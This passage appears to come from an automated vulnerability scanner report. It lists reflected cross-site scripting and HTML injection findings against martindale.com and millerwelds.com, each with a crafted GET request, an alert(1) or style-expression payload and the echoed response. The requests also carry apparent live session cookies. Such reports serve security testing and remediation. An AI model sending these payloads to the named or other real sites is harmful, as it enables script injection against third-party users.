The value of the hid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72516"style%3d"x%3aexpression(alert(1))"65e10972882556847 was submitted in the hid parameter. This input was echoed as 72516"style="x:expression(alert(1))"65e10972882556847 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=72516"style%3d"x%3aexpression(alert(1))"65e10972882556847&ft=1&ns=&n=0&ne=&sh=&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90374
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181302437997920&InitialSearchId=201104181302437997920; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:57:44 GMT; path=/
Date: Mon, 18 Apr 2011 17:02:43 GMT
X-RE-Ref: 1 1545556562
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="hid" name="hid" value="72516"style="x:expression(alert(1))"65e10972882556847">
...[SNIP]...
4.117. http://www.martindale.com/Results.aspx [sh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the sh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259df"style%3d"x%3aexpression(alert(1))"db2e7570dde759634 was submitted in the sh parameter. This input was echoed as 259df"style="x:expression(alert(1))"db2e7570dde759634 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=&ft=1&ns=&n=0&ne=&sh=259df"style%3d"x%3aexpression(alert(1))"db2e7570dde759634&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90386
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181308118001985&InitialSearchId=201104181308118001985; domain=.martindale.com; expires=Mon, 18-Apr-2011 18:04:15 GMT; path=/
Date: Mon, 18 Apr 2011 17:09:15 GMT
X-RE-Ref: 1 1938278746
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="sh" name="sh" value="259df"style="x:expression(alert(1))"db2e7570dde759634">
...[SNIP]...
4.118. http://www.millerwelds.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 635e6"><a>104a9df6ec2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about635e6"><a>104a9df6ec2/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:22 GMT
Connection: Keep-Alive
Content-Length: 29434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonabout635e6"><a>104a9df6ec2">
...[SNIP]...
4.119. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f4a"><a>95607ef0d6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about95f4a"><a>95607ef0d6f/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:13 GMT
Connection: Keep-Alive
Content-Length: 29434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonabout95f4a"><a>95607ef0d6f">
...[SNIP]...
4.120. http://www.millerwelds.com/financing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc78e"><a>876a87a77f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /financingdc78e"><a>876a87a77f1/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:02 GMT
Connection: Keep-Alive
Content-Length: 29438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonfinancingdc78e"><a>876a87a77f1">
...[SNIP]...
4.121. http://www.millerwelds.com/financing/ [int_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcbf7</script><script>alert(1)</script>d68cbe19e50 was submitted in the int_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerlinedcbf7</script><script>alert(1)</script>d68cbe19e50 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:07 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-321856-3");
pageTracker._setCustomVar(1,"Internal%20Campaign","powerlinedcbf7</script><script>alert(1)</script>d68cbe19e50",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Cont
...[SNIP]...
4.122. http://www.millerwelds.com/financing/ [int_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_content request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1001</script><script>alert(1)</script>f6ba1b55bb7 was submitted in the int_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspaceb1001</script><script>alert(1)</script>f6ba1b55bb7&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:50 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspaceb1001</script><script>alert(1)</script>f6ba1b55bb7",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...
4.123. http://www.millerwelds.com/financing/ [int_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_medium request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119bd</script><script>alert(1)</script>4e4bb2b4230 was submitted in the int_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad119bd</script><script>alert(1)</script>4e4bb2b4230&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:32 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
._setCustomVar(1,"Internal%20Campaign","powerline",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad119bd</script><script>alert(1)</script>4e4bb2b4230",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspace",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...
4.124. http://www.millerwelds.com/financing/ [int_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4758a</script><script>alert(1)</script>57d87b0905b was submitted in the int_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/4758a</script><script>alert(1)</script>57d87b0905b&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:16 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
var pageTracker = _gat._getTracker("UA-321856-3");
pageTracker._setCustomVar(1,"Internal%20Campaign","powerline",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/4758a</script><script>alert(1)</script>57d87b0905b",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspace",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...
4.125. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1634a"><a>9d07cc5b4c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images1634a"><a>9d07cc5b4c4/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:50 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages1634a"><a>9d07cc5b4c4">
...[SNIP]...
4.126. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a5a"><a>0d7e05e3945 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images25a5a"><a>0d7e05e3945/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:50 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages25a5a"><a>0d7e05e3945">
...[SNIP]...
4.127. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c15db"><a>0a0ab305ada was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesc15db"><a>0a0ab305ada/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
